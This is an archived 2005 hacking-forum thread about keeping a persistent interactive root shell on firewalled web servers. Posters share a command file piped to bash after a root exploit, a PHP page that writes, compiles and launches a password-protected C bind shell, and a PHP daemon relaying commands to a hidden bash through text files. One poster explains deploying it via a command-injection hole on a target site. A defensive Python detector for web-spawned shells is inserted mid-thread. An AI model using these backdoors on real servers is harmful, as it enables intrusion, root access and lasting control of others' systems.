Waraxe IT Security Portal  
www.waraxe.us Forum Index -> Shell commands injection -> Interactive shell on php
Interactive shell on php
Posted: Fri Apr 08, 2005 11:08 pm
erg0t (Valuable expert, Joined: Apr 08, 2005, Posts: 55, Location: Uruguay)

I post this to discuss methods of getting something like an interactive shell via php.
It'll be very useful for servers with very restrictive firewalls that don't allow you to use any kind of backdoor (either reverse or non-TCP backdoors), so the only way to do something is via the php shell.

The method I use to get root and make some things is the following:

echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i

It's a very uncomfortable way, but it works for me.
It'd be nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot I made in C, forking and using pipes, but in php you are more restricted). It's a good project to try... any ideas?
Posted: Sat Apr 09, 2005 4:59 am
shai-tan (Valuable expert, Joined: Feb 22, 2005, Posts: 477)

I don't have any ideas but I must admit it's a firken cool idea.
In C you have more options but I truly like php more.

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Re: Interactive shell on php
Posted: Sat Apr 09, 2005 3:07 pm
y3dips (Valuable expert, Joined: Feb 25, 2005, Posts: 281, Location: Indonesia)

erg0t wrote:
I post this to discuss methods of getting something like an interactive shell via php.
It'll be very useful for servers with very restrictive firewalls that don't allow you to use any kind of backdoor (either reverse or non-TCP backdoors), so the only way to do something is via the php shell.

The method I use to get root and make some things is the following:

echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i

It's a very uncomfortable way, but it works for me.
It'd be nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot I made in C, forking and using pipes, but in php you are more restricted). It's a good project to try... any ideas?


sorry, i dont understand what are u trying to explain
from what i see u just run the exploit, then u get some root account, using "id" to check that

so? what is the interesting point?
or maybe i just dont get what u mean

if u need some more good "php shell" that is more interactive n without restriction / breaks the restriction, u need to start browsing more of this forum, coz we've already discussed it

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Sat Apr 09, 2005 3:47 pm
LINUX (Moderator, Joined: May 24, 2004, Posts: 404, Location: Caiman)

yes, it is a very good method for rooting servers with a firewall or where a reverse shell is not possible

in one .txt file add this content
-------------------------------------------------
echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
-----------------------------------------------------
final command is: cat commands | /bin/bash -i

with this line you run all the commands in the txt file. why does ergot run this? simple: this server has a firewall, it is not possible to exec a backdoor and not possible to exec a reverse shell, so it is a very good method

good ergot, and we need more ideas to develop an irc bot or similar

PS: a normal irc bot or phpshell cannot get root on a server; to get root you need a linux shell


if a waraxe member wants to share ideas on this theme, connect to IPV6.GIGACHAT.NET 6667 #uruguay
or via SSL connection /server -e irc.gigachat.net 6697 or /server irc.gigachat.net +6697 #Gigachat
channel #uruguay, or contact me in channels #asc #infektion #simiens
Re: Interactive shell on php
Posted: Sat Apr 09, 2005 10:41 pm
erg0t (Valuable expert, Joined: Apr 08, 2005, Posts: 55, Location: Uruguay)

y3dips wrote:
erg0t wrote:
I post this to discuss methods of getting something like an interactive shell via php.
It'll be very useful for servers with very restrictive firewalls that don't allow you to use any kind of backdoor (either reverse or non-TCP backdoors), so the only way to do something is via the php shell.

The method I use to get root and make some things is the following:

echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i

It's a very uncomfortable way, but it works for me.
It'd be nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot I made in C, forking and using pipes, but in php you are more restricted). It's a good project to try... any ideas?


sorry, i dont understand what are u trying to explain
from what i see u just run the exploit, then u get some root account, using "id" to check that

so? what is the interesting point?
or maybe i just dont get what u mean

if u need some more good "php shell" that is more interactive n without restriction / breaks the restriction, u need to start browsing more of this forum, coz we've already discussed it


The point is, when you call system(), etc, you don't have an interactive shell. For example, if you do system("cd /tmp"); and then system("pwd"); (if the script isn't in /tmp of course) the pwd call will not return /tmp,
because after system returns the shell is killed.
This is a problem when you try to use local exploits, so the idea is to try to make an interactive shell.
I was thinking for example of keeping a /bin/bash -i running in the background, redirecting the input and output to temporary files, and reading and writing them.

I did something like it using pipes in the C bot I'm developing.
You can see the sources at http://saure.no-ip.org/tools/eva/eva.c and http://saure.no-ip.org/tools/eva/eva.h (if you can't get in it's because my server is down at the moment, so try later).
I don't know if it is possible to make something like it in php, but we need to try Very Happy
Re: Interactive shell on php
Posted: Sun Apr 10, 2005 3:18 am
y3dips (Valuable expert, Joined: Feb 25, 2005, Posts: 281, Location: Indonesia)

erg0t wrote:

The point is, when you call system(), etc, you don't have an interactive shell. For example, if you do system("cd /tmp"); and then system("pwd"); (if the script isn't in /tmp of course) the pwd call will not return /tmp,
because after system returns the shell is killed.
This is a problem when you try to use local exploits, so the idea is to try to make an interactive shell.
I was thinking for example of keeping a /bin/bash -i running in the background, redirecting the input and output to temporary files, and reading and writing them.

I did something like it using pipes in the C bot I'm developing.
You can see the sources at http://saure.no-ip.org/tools/eva/eva.c and http://saure.no-ip.org/tools/eva/eva.h (if you can't get in it's because my server is down at the moment, so try later).
I don't know if it is possible to make something like it in php, but we need to try Very Happy


now, i got the point
doin some backdooring, right?

you can do it with php but you have to run the script (web browser) all the time Laughing (or you need to run it when u need to enter)
ive seen some php shells doin that, just binding to one port (but not reverse like LINUX said)

maybe something like this

Code:


/* Bind Shell on port */


$port_bind_bd_c="
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(argc < 3) usage(argv[0]);
if(fork() == 0) { // Fork a new process
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror(\"socket error\");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,\"Password:\",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system(\"echo welcome to r57 shell && /bin/bash -i\");
else
fprintf(stderr,\"Sorry\");
close(newfd);
}
}
}
int usage(char *progname)
{
fprintf(stderr,\"USAGE:%s <port num> <password>\n\",progname);
exit(0);
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}";


?>

<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>Bind port to /bin/bash</div></b></font></td></tr>
<tr><td>
<?
/* port bind form */
echo "<form name=bind method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b>Port <font face=Wingdings color=gray>и</font></b>";
echo "<input type=text name=port size=15 value=55556> ";
echo "<b> Password <font face=Wingdings color=gray>и</font>    </b>";
echo "<input type=text name=bind_pass size=15 value=> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=hidden name=bind size=1 value=bd.c>";
echo "      <input type=submit name=submit value=\" Bind \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>

<?
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
{
 $w_file=fopen("/tmp/bd.c","ab+") or exit();
 fputs($w_file,$port_bind_bd_c);
 fclose($w_file);
 $_POST['cmd']="cd /tmp/; gcc -o bd bd.c; ./bd ".$_POST['port']." ".$_POST['bind_pass']."; ps -aux | grep bd";
}
?>

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Sun Apr 10, 2005 4:03 am
erg0t (Valuable expert, Joined: Apr 08, 2005, Posts: 55, Location: Uruguay)

Are you saying to run a backdoor and connect to it with a client running from the same machine, doing the client in php?
So, locally bypass the firewall?
It's a good idea but in this case it's better to use UNIX sockets, or fifos, or something else.
I think the better choice is UNIX sockets because they are bidirectional, so with one socket you can do the same as with 2 pipes or fifos.

So the way that you propose to follow is to make a server in another language, and only the client in php.
It's a very good idea but it'd be REALLY COOL to try to make it all in php. Very Happy
Posted: Sun Apr 10, 2005 11:29 am
y3dips (Valuable expert, Joined: Feb 25, 2005, Posts: 281, Location: Indonesia)

erg0t wrote:
Are you saying to run a backdoor and connect to it with a client running from the same machine, doing the client in php?
So, locally bypass the firewall?
It's a good idea but in this case it's better to use UNIX sockets, or fifos, or something else.
I think the better choice is UNIX sockets because they are bidirectional, so with one socket you can do the same as with 2 pipes or fifos.

So the way that you propose to follow is to make a server in another language, and only the client in php.
It's a very good idea but it'd be REALLY COOL to try to make it all in php. Very Happy


no, here's the scenario..
- save the script as bd.php on the "target" machine
- then access it with your browser, eg: http://lame.com/phpbb/bd.php
- then input the port, password n run the port binding
- open your shell, then telnet to http://lame.com [port]

it's just another bindtelnet but running on the webserver

thats all

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Sun Apr 10, 2005 2:56 pm
erg0t (Valuable expert, Joined: Apr 08, 2005, Posts: 55, Location: Uruguay)

But we are talking about firewalled servers, we can't use backdoors, that's why this thread exists Smile
Posted: Sun Apr 10, 2005 7:28 pm
Heintz (Valuable expert, Joined: Jun 12, 2004, Posts: 88, Location: Estonia/Sweden)

it's quite hard to understand what you're trying to achieve here, but at first i made a
usual tcp backdoor in php5 (if you're interested i still have it). but then (i think)
i understood what you needed: a shell through php (web security hole) which would not disappear. but you can't put a backdoor because of firewalls and the only thing you've got is that security hole.
anyway here's the code:

Code:

<?php
/*
By Heintz to http://www.waraxe.us.
in.txt is file where you put (echo "pwd" > in.txt) commands.
predefined commands:
"quit" - will stop the demon.
"clear" - truncates out.txt
out.txt is where you get results from bash

this is little demon that "listens" to in.txt as it would be binded to some port ;)
*/

set_time_limit(0);

$in = 'in.txt';
$bashout = 'out.txt';

$bashin = popen('bash > ' . $bashout, 'w');
if($bashin == false)
{
        echo "could not open bash\n";
        exit(1);
}

while(1)
{
        clearstatcache();
        $read = stat($in);

        if($read['size'] > 0)
        {
                $script_in = fopen($in, 'r');
                while(flock($script_in, LOCK_EX) == false)
                {
                        sleep(1);
                }

                $data = fread($script_in, filesize($in));
                flock($script_in, LOCK_UN);
                fclose($script_in);

                @fclose(@fopen($in, 'w')); // truncate

                $data = trim($data);

                if($data == 'quit')
                {
                        break;
                }
                elseif($data == 'clear')
                {
                        fclose(fopen($bashout, 'w'));
                        continue;
                }

                fputs($bashin, $data . "\n");

        }

        sleep(1);

}

@pclose($bashin);
exit();
?>


i hope this is the thing you were after Question Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
Posted: Sun Apr 10, 2005 8:02 pm
erg0t (Valuable expert, Joined: Apr 08, 2005, Posts: 55, Location: Uruguay)

I THINK YOU MADE IT MAN!
I don't know php but I think I understood your code and I'm sure that it's what I was looking for.
Congratulations and thank you!
salu2
Posted: Mon Apr 11, 2005 3:00 am
y3dips (Valuable expert, Joined: Feb 25, 2005, Posts: 281, Location: Indonesia)

erg0t wrote:
But we are talking about firewalled servers, we can't use backdoors, that's why this thread exists Smile


yup, but if u use a php shell or even cgi-telnet, u won't need to think about the firewall, because port 80 is always open Smile

if u want some reverse shell to ure machine with php, i still haven't found it

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Mon Apr 11, 2005 3:10 am
y3dips (Valuable expert, Joined: Feb 25, 2005, Posts: 281, Location: Indonesia)

Heintz: i understand your script, n i already tried it, but it won't work

here's the scenario:
1. i copy your script to bd.php
2. i make in.txt and out.txt with permission 777 (????? <-- koz the web server will write to this file, insecurity ????)
3. i make some command n put it into in.txt? (am i right?)
for example
//in.txt---
echo "pwd" > out.txt

4. i run my web browser, point the url to http://loclahost/~y3dips/bd.php
5. what do i get here?
- the page is stalled (bd.php is processing without any output in the browser, i understand this)
- script running
#ps -axf

4320 ? S 0:00 \_ /usr/sbin/httpd
4398 ? S 0:00 | \_ sh -c bash > out.txt
4399 ? S 0:00 | \_ bash

but, no output when i tail out.txt
# tail -f public_html/out.txt


CMIIW

give me some short n real scenario, so i can try
sorry for my dumb question

_________________
IO::y3dips->new(http://clog.ammar.web.id);
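Reading the ps -axf listing in this post the way a defender would: the tell-tale shape of the daemon described in the thread is a web-server child running "sh -c bash > out.txt" with a long-lived bash beneath it. The following is an added Python example, not code from the thread or from any of its posters, that parses ps forest output, rebuilds the parent chain from the indentation, and reports every shell whose ancestor is a web-server process. The sample listing inside the block is constructed for the example, modelled on the one quoted above, and the sets of web-server and shell names are assumptions a site would tune.

```python
import re
import subprocess
from dataclasses import dataclass

# Constructed sample modelled on the `ps -axf` listing quoted in the post above
# (not output captured from any real system). It holds one shell spawned under
# httpd, as the post describes, next to an ordinary login shell under sshd.
SAMPLE_PS_AXF = """\
  PID TTY      STAT   TIME COMMAND
 4300 ?        Ss     0:00 /usr/sbin/httpd
 4320 ?        S      0:00  \\_ /usr/sbin/httpd
 4398 ?        S      0:00  |   \\_ sh -c bash > out.txt
 4399 ?        S      0:00  |       \\_ bash
 4401 ?        S      0:00  \\_ /usr/sbin/httpd
 1200 ?        Ss     0:00 /usr/sbin/sshd
 1250 ?        S      0:00  \\_ sshd: alice [priv]
 1251 pts/0    Ss     0:00      \\_ -bash
"""

# Assumed name sets: which ancestors count as a web server, which children as a shell.
WEB_SERVERS = {"httpd", "apache2", "php-fpm", "php-cgi", "nginx", "lighttpd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# One `ps -axf` row: PID, TTY, STAT, TIME, then a single separator space and the
# COMMAND column, whose leading " \_ " / "|   " tree drawing encodes the depth.
LINE_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(\d+:\d+) (.*)$")
TREE_CHARS = " |\\_"  # characters ps uses to draw the forest (a command whose
                      # argv[0] starts with '_' would lose that char; none do here)


@dataclass
class Proc:
    pid: int
    depth: int
    args: str        # command line with the tree prefix removed
    ancestors: list  # command lines of the ancestors, root first


def command_name(args: str) -> str:
    """Basename of argv[0]; login shells appear as '-bash', so drop the dash."""
    first = args.split(None, 1)[0] if args.strip() else ""
    return first.rsplit("/", 1)[-1].lstrip("-")


def parse_ps_axf(text: str) -> list:
    """Rebuild parent/child relations from the indentation of `ps -axf` output."""
    procs, stack = [], []  # stack: (depth, Proc) along the branch being walked
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:              # header line or blank
            continue
        pid, _tty, _stat, _time, cmd = m.groups()
        body = cmd.lstrip(TREE_CHARS)
        depth = (len(cmd) - len(body)) // 4   # each nesting level is 4 columns wide
        while stack and stack[-1][0] >= depth:
            stack.pop()        # climbed back out of a deeper branch
        proc = Proc(int(pid), depth, body, [p.args for _, p in stack])
        procs.append(proc)
        stack.append((depth, proc))
    return procs


def find_web_spawned_shells(text: str) -> list:
    """Return (pid, args, web_server_ancestor) for every shell under a web server."""
    hits = []
    for p in parse_ps_axf(text):
        if command_name(p.args) not in SHELLS:
            continue
        web_parent = next((a for a in p.ancestors if command_name(a) in WEB_SERVERS), None)
        if web_parent is not None:
            hits.append((p.pid, p.args, web_parent))
    return hits


def live_ps_axf() -> str:
    """Capture the current process forest from procps `ps` (Linux)."""
    return subprocess.run(["ps", "-axf"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Runs on the constructed sample; pass live_ps_axf() instead to check a real host.
    for pid, args, parent in find_web_spawned_shells(SAMPLE_PS_AXF):
        print(f"pid {pid}: '{args}' runs under '{parent}'")
```

On the sample this reports pids 4398 and 4399 under /usr/sbin/httpd and stays silent about the login shell under sshd. A web server that legitimately never spawns shells (the common case for PHP applications) makes this a low-noise check to run from cron or an EDR query, and the same parent-chain logic applies to the "cat commands | /bin/bash -i" pattern from the first post, which likewise shows up as a shell whose ancestor is the web server.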
Posted: Mon Apr 11, 2005 12:13 pm
Heintz (Valuable expert, Joined: Jun 12, 2004, Posts: 88, Location: Estonia/Sweden)

here's how you should use it

let's say you've got a vulnerability in site "a" which lets you execute commands through one of php's program execution functions, let's say system().
but site "a" has a firewall which doesn't allow anything other than the webserver to connect to the server or from the server. so you can't create a backdoor.
this is where this script comes in handy. let's say you echo or whatever get this thing up to site a/script.php and manage to execute it (either from the command line or by visiting it from the web). now you start giving it commands "through" that vulnerability, like system('echo "pwd" > in.txt'); this script reads the command from in.txt, executes it and returns the output to out.txt. and you could then read out.txt like system('cat out.txt'); but the script runs all the time so your shell "stays". so now you can give it commands manually.


edit:
this script is not supposed to be an all-platform ready-to-use app. there may be php safe mode, which i have not tested, and so on. this is where your own skills come in. i just showed one way to make a solution to this kind of problem.

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"